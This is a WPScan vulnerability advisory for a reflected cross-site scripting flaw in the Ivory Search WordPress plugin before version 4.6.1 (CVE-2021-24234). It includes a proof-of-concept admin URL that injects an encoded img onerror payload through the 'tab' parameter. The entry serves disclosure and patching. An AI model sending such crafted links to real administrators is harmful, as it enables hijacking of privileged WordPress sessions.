Ivory Search < 4.6.1 - Reflected Cross Site Scripting (XSS)

Description

The Search Forms page of the plugin did not properly sanitise the tab parameter before output it in the page, leading to a reflected Cross-Site Scripting issue when opening a malicious crafted link as a high privilege user. Knowledge of a form id is required to conduct the attack.

Proof of Concept

https://example.com/wp-admin/admin.php?page=ivory-search&post=<form-id>&action=edit&tab=excludes%22%3E%3Cimg+src+onerror%3Dalert%28%2FXSS%2F%29%3E

Affects Plugins

add-search-to-menu

Fixed in version 4.6.1✓

References

CVE

CVE-2021-24234

URL

https://www.getastra.com/blog/911/plugin-exploit/reflected-xss-vulnerability-in-ivory-search-wp-plugin/

URL

https://www.jinsonvarghese.com/reflected-xss-vulnerability-found-in-ivory-search-plugin/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

Jinson Varghese Behanan

Submitter

Jinson Varghese Behanan

Submitter website

https://www.jinsonvarghese.com

Submitter twitter

JinsonCyberSec

Verified

Yes

WPVDB ID

ecc620be-8e29-4860-9d32-86b5814a3835

Timeline

Publicly Published

2021-03-30 (about 7 months ago)

Added

2021-03-30 (about 7 months ago)

Last Updated

2021-03-31 (about 7 months ago)

Our Other Services

WPScan WordPress Security Plugin